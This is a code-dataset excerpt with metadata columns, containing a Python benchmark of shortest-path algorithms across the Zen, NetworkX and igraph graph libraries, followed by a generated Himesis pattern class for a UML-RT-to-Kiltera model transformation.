| 0
| 0
| 0
| 0
| 0.54321
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
1d047e03d7c5c512bdfe267e87a7b24f4d525cc3
| 5,401
|
py
|
Python
|
src/zen/benchmarks/shortest_path.py
|
wangyiranamy/Testing
|
2a729d1f73b6df69150807b965b8fedbb7661c04
|
[
"BSD-3-Clause"
] | 41
|
2015-01-13T19:49:50.000Z
|
2021-05-02T04:11:19.000Z
|
src/zen/benchmarks/shortest_path.py
|
wangyiranamy/Testing
|
2a729d1f73b6df69150807b965b8fedbb7661c04
|
[
"BSD-3-Clause"
] | 9
|
2015-01-28T10:46:27.000Z
|
2022-03-12T06:32:39.000Z
|
src/zen/benchmarks/shortest_path.py
|
wangyiranamy/Testing
|
2a729d1f73b6df69150807b965b8fedbb7661c04
|
[
"BSD-3-Clause"
] | 19
|
2015-01-27T12:19:42.000Z
|
2019-07-20T21:30:56.000Z
|
from zen.util.benchmark import Benchmark
import networkx as nx
import zen as zn
import igraph as ig
import random
class AllPairsBenchmark(Benchmark):
    """Compare Zen's all-pairs shortest-path implementations on one ER graph."""

    def __init__(self):
        Benchmark.__init__(self, 'All Pairs Comparison')
        self.NUM_NODES = 200
        self.NUM_SOURCES = 20  # kept for parity with the SSSP benchmarks (unused here)
        self.P = 0.05

    def setup(self):
        """Build an Erdos-Renyi G(n, p) random graph in Zen."""
        graph = zn.Graph()
        for node in range(self.NUM_NODES):
            graph.add_node(node)
        # Independently include each unordered node pair with probability P.
        for u in range(self.NUM_NODES):
            for v in range(u + 1, self.NUM_NODES):
                if random.random() < self.P:
                    graph.add_edge_(u, v)
        self.ER_G = graph

    def bm_floyd_warshall(self):
        zn.floyd_warshall_path_length_(self.ER_G)

    def bm_apsp(self):
        zn.all_pairs_shortest_path_length_(self.ER_G)

    def bm_apsp_dijkstra(self):
        zn.all_pairs_dijkstra_path_length_(self.ER_G)
class UUERSSSPBenchmark(Benchmark):
    """Benchmark unweighted single-source shortest paths in Zen, NetworkX and igraph."""

    def __init__(self):
        Benchmark.__init__(self, 'Unweighted SSSP')
        self.NUM_NODES = 200
        self.NUM_SOURCES = 20
        self.P = 0.05

    def setup(self):
        """Build an ER graph in Zen and draw NUM_SOURCES random source nodes."""
        graph = zn.Graph()
        for node in range(self.NUM_NODES):
            graph.add_node(node)
        # Independently include each unordered node pair with probability P.
        for u in range(self.NUM_NODES):
            for v in range(u + 1, self.NUM_NODES):
                if random.random() < self.P:
                    graph.add_edge_(u, v)
        self.ER_G = graph
        self.sources = random.sample(range(self.NUM_NODES), self.NUM_SOURCES)

    def bm_zen(self):
        for src in self.sources:
            zn.single_source_shortest_path(self.ER_G, src)

    def bm_zenopt(self):
        for src in self.sources:
            zn.single_source_shortest_path_(self.ER_G, src)

    def setup_networkx(self):
        """Mirror the Zen graph into a NetworkX graph."""
        mirror = nx.Graph()
        for node in self.ER_G.nodes_iter():
            mirror.add_node(node)
        for endpoints in self.ER_G.edges_iter():
            mirror.add_edge(*endpoints)
        self.nx_ER_G = mirror

    def bm_networkx(self):
        for src in self.sources:
            nx.single_source_shortest_path(self.nx_ER_G, src)

    def setup_igraph(self):
        """Mirror the Zen graph into an igraph graph."""
        mirror = ig.Graph()
        mirror.add_vertices(len(self.ER_G))
        mirror.add_edges(self.ER_G.edges())
        self.ig_ER_G = mirror

    def bm_igraph(self):
        for src in self.sources:
            self.ig_ER_G.get_shortest_paths(src)
class UERDijkstraBenchmark(Benchmark):
    """Benchmark Dijkstra single-source shortest paths in Zen, NetworkX and igraph."""

    def __init__(self):
        Benchmark.__init__(self, 'Dijkstra')
        self.NUM_NODES = 200
        self.NUM_SOURCES = 20
        self.P = 0.05

    def setup(self):
        """Build an ER graph in Zen and draw NUM_SOURCES random source nodes."""
        graph = zn.Graph()
        for node in range(self.NUM_NODES):
            graph.add_node(node)
        # Independently include each unordered node pair with probability P.
        for u in range(self.NUM_NODES):
            for v in range(u + 1, self.NUM_NODES):
                if random.random() < self.P:
                    graph.add_edge_(u, v)
        self.ER_G = graph
        self.sources = random.sample(range(self.NUM_NODES), self.NUM_SOURCES)

    def bm_zen(self):
        for src in self.sources:
            zn.dijkstra_path(self.ER_G, src)

    def bm_zenopt(self):
        for src in self.sources:
            zn.dijkstra_path_(self.ER_G, src)

    def setup_networkx(self):
        """Mirror the Zen graph into a NetworkX graph."""
        mirror = nx.Graph()
        for node in self.ER_G.nodes_iter():
            mirror.add_node(node)
        for endpoints in self.ER_G.edges_iter():
            mirror.add_edge(*endpoints)
        self.nx_ER_G = mirror

    def bm_networkx(self):
        for src in self.sources:
            nx.single_source_dijkstra(self.nx_ER_G, src)

    def setup_igraph(self):
        """Mirror the Zen graph into an igraph graph."""
        mirror = ig.Graph()
        mirror.add_vertices(len(self.ER_G))
        mirror.add_edges(self.ER_G.edges())
        self.ig_ER_G = mirror

    def bm_igraph(self):
        for src in self.sources:
            self.ig_ER_G.get_shortest_paths(src)
class UERFloydWarshallBenchmark(Benchmark):
    """Benchmark Floyd-Warshall all-pairs path lengths in Zen and NetworkX."""

    def __init__(self):
        Benchmark.__init__(self, 'Floyd-Warshall')
        self.NUM_NODES = 200
        self.NUM_SOURCES = 20  # kept for parity with the SSSP benchmarks (unused here)
        self.P = 0.05

    def setup(self):
        """Build an Erdos-Renyi G(n, p) random graph in Zen."""
        graph = zn.Graph()
        for node in range(self.NUM_NODES):
            graph.add_node(node)
        # Independently include each unordered node pair with probability P.
        for u in range(self.NUM_NODES):
            for v in range(u + 1, self.NUM_NODES):
                if random.random() < self.P:
                    graph.add_edge_(u, v)
        self.ER_G = graph

    def bm_zen(self):
        zn.floyd_warshall_path_length(self.ER_G)

    def bm_zenopt(self):
        zn.floyd_warshall_path_length_(self.ER_G)

    def setup_networkx(self):
        """Mirror the Zen graph into a NetworkX graph."""
        mirror = nx.Graph()
        for node in self.ER_G.nodes_iter():
            mirror.add_node(node)
        for endpoints in self.ER_G.edges_iter():
            mirror.add_edge(*endpoints)
        self.nx_ER_G = mirror

    def bm_networkx(self):
        nx.floyd_warshall(self.nx_ER_G)

    def setup_igraph(self):
        """Mirror the Zen graph into an igraph graph."""
        mirror = ig.Graph()
        mirror.add_vertices(len(self.ER_G))
        mirror.add_edges(self.ER_G.edges())
        self.ig_ER_G = mirror

    # The igraph timing was deliberately disabled in the original source:
    # def bm_igraph(self):
    #     self.ig_ER_G.shortest_paths()
class UUERAPSPBenchmark(Benchmark):
    """Benchmark unweighted all-pairs shortest paths in Zen, NetworkX and igraph."""

    def __init__(self):
        Benchmark.__init__(self, 'Unweighted APSP')
        self.NUM_NODES = 200
        self.NUM_SOURCES = 20  # kept for parity with the SSSP benchmarks (unused here)
        self.P = 0.05

    def setup(self):
        """Build an Erdos-Renyi G(n, p) random graph in Zen."""
        graph = zn.Graph()
        for node in range(self.NUM_NODES):
            graph.add_node(node)
        # Independently include each unordered node pair with probability P.
        for u in range(self.NUM_NODES):
            for v in range(u + 1, self.NUM_NODES):
                if random.random() < self.P:
                    graph.add_edge_(u, v)
        self.ER_G = graph

    def bm_zen(self):
        zn.all_pairs_shortest_path_length(self.ER_G)

    def bm_zenopt(self):
        zn.all_pairs_shortest_path_length_(self.ER_G)

    def setup_networkx(self):
        """Mirror the Zen graph into a NetworkX graph."""
        mirror = nx.Graph()
        for node in self.ER_G.nodes_iter():
            mirror.add_node(node)
        for endpoints in self.ER_G.edges_iter():
            mirror.add_edge(*endpoints)
        self.nx_ER_G = mirror

    def bm_networkx(self):
        nx.all_pairs_shortest_path_length(self.nx_ER_G)

    def setup_igraph(self):
        """Mirror the Zen graph into an igraph graph."""
        mirror = ig.Graph()
        mirror.add_vertices(len(self.ER_G))
        mirror.add_edges(self.ER_G.edges())
        self.ig_ER_G = mirror

    def bm_igraph(self):
        self.ig_ER_G.shortest_paths()
| 21.866397
| 70
| 0.704869
| 1,001
| 5,401
| 3.504496
| 0.072927
| 0.063284
| 0.083808
| 0.041049
| 0.90878
| 0.900513
| 0.880559
| 0.848917
| 0.81984
| 0.81984
| 0
| 0.010036
| 0.169783
| 5,401
| 247
| 71
| 21.866397
| 0.772302
| 0.046288
| 0
| 0.813665
| 0
| 0
| 0.014019
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.223602
| false
| 0
| 0.031056
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0dffaaf950ecf964b1ebc985124bc2d1a13ddc8f
| 33,251
|
py
|
Python
|
UMLRT2Kiltera_MM/Properties/positive/Himesis/HExitpoint2procdefparTrue_CompleteLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 3
|
2017-06-02T19:26:27.000Z
|
2021-06-14T04:25:45.000Z
|
UMLRT2Kiltera_MM/Properties/positive/Himesis/HExitpoint2procdefparTrue_CompleteLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 8
|
2016-08-24T07:04:07.000Z
|
2017-05-26T16:22:47.000Z
|
UMLRT2Kiltera_MM/Properties/positive/Himesis/HExitpoint2procdefparTrue_CompleteLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 1
|
2019-10-31T06:00:23.000Z
|
2019-10-31T06:00:23.000Z
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import cPickle as pickle
from uuid import UUID
class HExitpoint2procdefparTrue_CompleteLHS(HimesisPreConditionPatternLHS):
def __init__(self):
    """
    Creates the himesis graph representing the AToM3 model HExitpoint2procdefparTrue_CompleteLHS.

    Generated code: the superclass constructor allocates the 16 pattern
    nodes; the edges, graph-level attributes and per-node matching
    attributes are then filled in below.
    """
    # Flag this instance as compiled now
    self.is_compiled = True
    super(HExitpoint2procdefparTrue_CompleteLHS, self).__init__(name='HExitpoint2procdefparTrue_CompleteLHS', num_nodes=16, edges=[])
    # Add the edges
    self.add_edges([(5, 0), (4, 0), (13, 1), (15, 1), (1, 6), (1, 4), (6, 2), (12, 2), (14, 2), (7, 3), (3, 14), (3, 15), (11, 5), (10, 12), (10, 13), (10, 7), (11, 8), (8, 9)])
    # Set the graph attributes
    # mm__: pickled list of the metamodel names this pattern conforms to.
    self["mm__"] = pickle.loads("""(lp1
S'MT_pre__UMLRT2Kiltera_MM'
p2
aS'MoTifRule'
p3
a.""")
    # Pattern-wide constraint source, evaluated after all LHS nodes matched.
    self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
    self["name"] = """"""
    self["GUID__"] = UUID('89f8bcc5-c4cb-4e6e-922e-50a03246e1b5')
    # Set the node attributes
    # vs[0]: attribute node labelled 'isComposite' (MT_pre__Attribute); its
    # pickled constraints require Type == Bool and name == isComposite.
    self.vs[0]["MT_subtypeMatching__"] = False
    self.vs[0]["MT_pre__Type"] = pickle.loads("""V\u000a#===============================================================================\u000a# This code is executed when evaluating if a node shall be matched by this rule.\u000a# You can access the value of the current node's attribute value by: attr_value.\u000a# You can access any attribute x of this node by: this['x'].\u000a# If the constraint relies on attribute values from other nodes,\u000a# use the LHS/NAC constraint instead.\u000a# The given constraint must evaluate to a boolean expression.\u000a#===============================================================================\u000a\u000areturn attr_value==Bool\u000a
p1
.""")
    self.vs[0]["MT_label__"] = """isComposite"""
    self.vs[0]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[0]["mm__"] = """MT_pre__Attribute"""
    self.vs[0]["MT_pre__name"] = pickle.loads("""V\u000a#===============================================================================\u000a# This code is executed when evaluating if a node shall be matched by this rule.\u000a# You can access the value of the current node's attribute value by: attr_value.\u000a# You can access any attribute x of this node by: this['x'].\u000a# If the constraint relies on attribute values from other nodes,\u000a# use the LHS/NAC constraint instead.\u000a# The given constraint must evaluate to a boolean expression.\u000a#===============================================================================\u000a\u000areturn attr_value==isComposite\u000a
p1
.""")
    self.vs[0]["MT_dirty__"] = False
    self.vs[0]["GUID__"] = UUID('4b228af6-1b8e-47ac-8a6a-e613c0896903')
    # vs[1]: State node, pattern label "1"; attribute slots unconstrained.
    self.vs[1]["MT_subtypeMatching__"] = False
    self.vs[1]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[1]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[1]["MT_label__"] = """1"""
    self.vs[1]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[1]["mm__"] = """MT_pre__State"""
    self.vs[1]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[1]["MT_dirty__"] = False
    self.vs[1]["GUID__"] = UUID('e04fad07-44c3-4984-a01d-0a49e0f967ce')
    # vs[2]: ExitPoint node, pattern label "2"; attribute slots unconstrained.
    self.vs[2]["MT_subtypeMatching__"] = False
    self.vs[2]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[2]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[2]["MT_label__"] = """2"""
    self.vs[2]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[2]["mm__"] = """MT_pre__ExitPoint"""
    self.vs[2]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[2]["MT_dirty__"] = False
    self.vs[2]["GUID__"] = UUID('782954d0-ac94-41cf-a96f-f0c59ed3d5e3')
    # vs[3]: Par node, pattern label "5"; may also match the MT_pre__Seq subtype.
    self.vs[3]["MT_subtypeMatching__"] = False
    self.vs[3]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[3]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[3]["MT_label__"] = """5"""
    self.vs[3]["MT_subtypes__"] = pickle.loads("""(lp1
S'MT_pre__Seq'
p2
a.""")
    self.vs[3]["mm__"] = """MT_pre__Par"""
    self.vs[3]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[3]["MT_dirty__"] = False
    self.vs[3]["GUID__"] = UUID('4edc32bc-b287-4859-b29c-2fe8371c7cf6')
    # vs[4]: hasAttribute_S association node, pattern label "11".
    self.vs[4]["MT_subtypeMatching__"] = False
    self.vs[4]["MT_label__"] = """11"""
    self.vs[4]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[4]["mm__"] = """MT_pre__hasAttribute_S"""
    self.vs[4]["MT_dirty__"] = False
    self.vs[4]["GUID__"] = UUID('8ba17629-3157-4508-b536-29ac3e5e0815')
    # vs[5]: leftExpr association node, pattern label "9".
    self.vs[5]["MT_subtypeMatching__"] = False
    self.vs[5]["MT_label__"] = """9"""
    self.vs[5]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[5]["mm__"] = """MT_pre__leftExpr"""
    self.vs[5]["MT_dirty__"] = False
    self.vs[5]["GUID__"] = UUID('545f77cd-8a95-4bdf-994e-3ce81c4b4000')
    # vs[6]: directLink_S association node, pattern label "3".
    self.vs[6]["MT_subtypeMatching__"] = False
    self.vs[6]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[6]["MT_label__"] = """3"""
    self.vs[6]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[6]["mm__"] = """MT_pre__directLink_S"""
    self.vs[6]["MT_dirty__"] = False
    self.vs[6]["GUID__"] = UUID('c19fa7e9-a26a-4bd3-8c45-52bf3730b63a')
    # vs[7]: directLink_T association node, pattern label "6".
    self.vs[7]["MT_subtypeMatching__"] = False
    self.vs[7]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[7]["MT_label__"] = """6"""
    self.vs[7]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[7]["mm__"] = """MT_pre__directLink_T"""
    self.vs[7]["MT_dirty__"] = False
    self.vs[7]["GUID__"] = UUID('954e7ea1-fe00-40a6-813e-df6ff761c2ab')
    # vs[8]: rightExpr association node, pattern label "10".
    self.vs[8]["MT_subtypeMatching__"] = False
    self.vs[8]["MT_label__"] = """10"""
    self.vs[8]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[8]["mm__"] = """MT_pre__rightExpr"""
    self.vs[8]["MT_dirty__"] = False
    self.vs[8]["GUID__"] = UUID('92c871e5-71ee-4d4a-ba84-ae16b4b126f7')
    # vs[9]: Constant node, pattern label "7"; its pickled constraints
    # require Type == Bool and name == true.
    self.vs[9]["MT_subtypeMatching__"] = False
    self.vs[9]["MT_pre__Type"] = pickle.loads("""V\u000a#===============================================================================\u000a# This code is executed when evaluating if a node shall be matched by this rule.\u000a# You can access the value of the current node's attribute value by: attr_value.\u000a# You can access any attribute x of this node by: this['x'].\u000a# If the constraint relies on attribute values from other nodes,\u000a# use the LHS/NAC constraint instead.\u000a# The given constraint must evaluate to a boolean expression.\u000a#===============================================================================\u000a\u000areturn attr_value==Bool\u000a
p1
.""")
    self.vs[9]["MT_label__"] = """7"""
    self.vs[9]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[9]["mm__"] = """MT_pre__Constant"""
    self.vs[9]["MT_pre__name"] = pickle.loads("""V\u000a#===============================================================================\u000a# This code is executed when evaluating if a node shall be matched by this rule.\u000a# You can access the value of the current node's attribute value by: attr_value.\u000a# You can access any attribute x of this node by: this['x'].\u000a# If the constraint relies on attribute values from other nodes,\u000a# use the LHS/NAC constraint instead.\u000a# The given constraint must evaluate to a boolean expression.\u000a#===============================================================================\u000a\u000areturn attr_value==true\u000a
p1
.""")
    self.vs[9]["MT_dirty__"] = False
    self.vs[9]["GUID__"] = UUID('0e0afbd2-0b08-4c80-93d8-22840624350e')
    # vs[10]: ProcDef node, pattern label "4"; may also match the
    # MT_pre__Module subtype.
    self.vs[10]["MT_subtypeMatching__"] = False
    self.vs[10]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[10]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[10]["MT_label__"] = """4"""
    self.vs[10]["MT_subtypes__"] = pickle.loads("""(lp1
S'MT_pre__Module'
p2
a.""")
    self.vs[10]["mm__"] = """MT_pre__ProcDef"""
    self.vs[10]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[10]["MT_dirty__"] = False
    self.vs[10]["GUID__"] = UUID('38aa4a3e-148d-4932-9e55-dbca6fedcec3')
    # vs[11]: Equation node, pattern label "8"; name slot unconstrained.
    self.vs[11]["MT_subtypeMatching__"] = False
    self.vs[11]["MT_label__"] = """8"""
    self.vs[11]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[11]["mm__"] = """MT_pre__Equation"""
    self.vs[11]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
    self.vs[11]["MT_dirty__"] = False
    self.vs[11]["GUID__"] = UUID('ff7cb62b-fc3b-4ddf-97b4-9932803b33e0')
    # vs[12]..vs[15]: trace_link association nodes, pattern labels "12"-"15".
    self.vs[12]["MT_subtypeMatching__"] = False
    self.vs[12]["MT_label__"] = """12"""
    self.vs[12]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[12]["mm__"] = """MT_pre__trace_link"""
    self.vs[12]["MT_dirty__"] = False
    self.vs[12]["GUID__"] = UUID('2a7bc044-21d9-4cfa-a631-bbffad904630')
    self.vs[13]["MT_subtypeMatching__"] = False
    self.vs[13]["MT_label__"] = """13"""
    self.vs[13]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[13]["mm__"] = """MT_pre__trace_link"""
    self.vs[13]["MT_dirty__"] = False
    self.vs[13]["GUID__"] = UUID('cca758e7-0943-47f3-a592-fc49db2e370a')
    self.vs[14]["MT_subtypeMatching__"] = False
    self.vs[14]["MT_label__"] = """14"""
    self.vs[14]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[14]["mm__"] = """MT_pre__trace_link"""
    self.vs[14]["MT_dirty__"] = False
    self.vs[14]["GUID__"] = UUID('d899bfd5-ef12-40c0-ade6-c3ffcfa1a270')
    self.vs[15]["MT_subtypeMatching__"] = False
    self.vs[15]["MT_label__"] = """15"""
    self.vs[15]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
    self.vs[15]["mm__"] = """MT_pre__trace_link"""
    self.vs[15]["MT_dirty__"] = False
    self.vs[15]["GUID__"] = UUID('cb2f1e47-1c15-49cd-b182-bf69ef2e46df')
def eval_TypeisComposite(self, attr_value, this):
    # Constraint on the 'Type' slot of the 'isComposite' attribute node:
    # the node matches only when the attribute's type value equals Bool.
    # NOTE(review): 'Bool' is not defined in this module; presumably it is
    # injected by the matcher's evaluation environment -- confirm before
    # calling this method directly.
    return attr_value == Bool
def eval_nameisComposite(self, attr_value, this):
    # Constraint on the 'name' slot of the 'isComposite' attribute node:
    # the node matches only when the attribute's name equals isComposite.
    # NOTE(review): 'isComposite' is not defined in this module; presumably
    # it is injected by the matcher's evaluation environment -- confirm
    # before calling this method directly.
    return attr_value == isComposite
def eval_classtype1(self, attr_value, this):
    # Constraint for the 'classtype' attribute of the node labelled 1.
    # Unconstrained: every candidate value is accepted.
    return True
def eval_cardinality1(self, attr_value, this):
    # Constraint for the 'cardinality' attribute of the node labelled 1.
    # Unconstrained: every candidate value is accepted.
    return True
def eval_name1(self, attr_value, this):
    # Constraint for the 'name' attribute of the node labelled 1.
    # Unconstrained: every candidate value is accepted.
    return True
def eval_classtype2(self, attr_value, this):
    """Attribute constraint for 'classtype' of node 2.

    No restriction: the node matches regardless of this attribute's value.
    """
    return True
def eval_cardinality2(self, attr_value, this):
    """Attribute constraint for 'cardinality' of node 2.

    Always matches; the attribute is not restricted by this rule.
    """
    return True
def eval_name2(self, attr_value, this):
    """Attribute constraint for 'name' of node 2.

    Unconstrained: any value passes.
    """
    return True
def eval_classtype5(self, attr_value, this):
    """Attribute constraint for 'classtype' of node 5.

    No restriction is imposed on the attribute value.
    """
    return True
def eval_cardinality5(self, attr_value, this):
    """Attribute constraint for 'cardinality' of node 5.

    Always matches.
    """
    return True
def eval_name5(self, attr_value, this):
    """Attribute constraint for 'name' of node 5.

    Unconstrained: every candidate value is accepted.
    """
    return True
def eval_associationType3(self, attr_value, this):
    """Attribute constraint for 'associationType' of node 3.

    No restriction: the association type is not checked here.
    """
    return True
def eval_associationType6(self, attr_value, this):
    """Attribute constraint for 'associationType' of node 6.

    Always matches; no value restriction.
    """
    return True
def eval_Type7(self, attr_value, this):
    # Attribute constraint for 'Type' of node 7: the node matches only when
    # the attribute equals Bool.
    # NOTE(review): 'Bool' is not defined in this chunk -- presumably a
    # module-level constant in the generated transformation module; confirm
    # it is in scope at call time.
    return attr_value==Bool
def eval_name7(self, attr_value, this):
    # Attribute constraint for 'name' of node 7: the node matches only when
    # the attribute equals `true`.
    # NOTE(review): `true` is not a Python name and is not defined in this
    # chunk -- this raises NameError unless a module-level `true` exists.
    # Possibly intended as the string 'true' or the boolean True; verify
    # against the generated module.
    return attr_value==true
def eval_classtype4(self, attr_value, this):
    """Attribute constraint for 'classtype' of node 4.

    Unconstrained: any value matches.
    """
    return True
def eval_cardinality4(self, attr_value, this):
    """Attribute constraint for 'cardinality' of node 4.

    Always matches; no restriction on the value.
    """
    return True
def eval_name4(self, attr_value, this):
    """Attribute constraint for 'name' of node 4.

    Unconstrained: every value is accepted.
    """
    return True
def eval_name8(self, attr_value, this):
    """Attribute constraint for 'name' of node 8.

    Unconstrained: every value is accepted.
    """
    return True
def constraint(self, PreNode, graph):
    """Post-match constraint executed after the LHS nodes are matched.

    @param PreNode: function mapping an integer label to its matched node;
                    attribute x of node n is PreNode('n')['x'].
    @param graph: the host graph being matched.
    @return: True -- no additional restriction, the rule may always apply.
    """
    return True
| 52.529226
| 692
| 0.529488
| 3,927
| 33,251
| 4.360071
| 0.066463
| 0.040299
| 0.054667
| 0.042051
| 0.863567
| 0.818362
| 0.814975
| 0.785305
| 0.781801
| 0.781801
| 0
| 0.027446
| 0.196806
| 33,251
| 632
| 693
| 52.612342
| 0.613659
| 0.330727
| 0
| 0.554318
| 0
| 0.011142
| 0.637442
| 0.192386
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058496
| false
| 0
| 0.008357
| 0.052925
| 0.169916
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df4e4fd804a3e784ef8012f2f474399f3e0b6392
| 298,752
|
py
|
Python
|
src/ea/servercontrols/RestTesterFunctions.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 9
|
2019-09-01T04:56:28.000Z
|
2021-04-08T19:45:52.000Z
|
src/ea/servercontrols/RestTesterFunctions.py
|
dmachard/extensivetesting
|
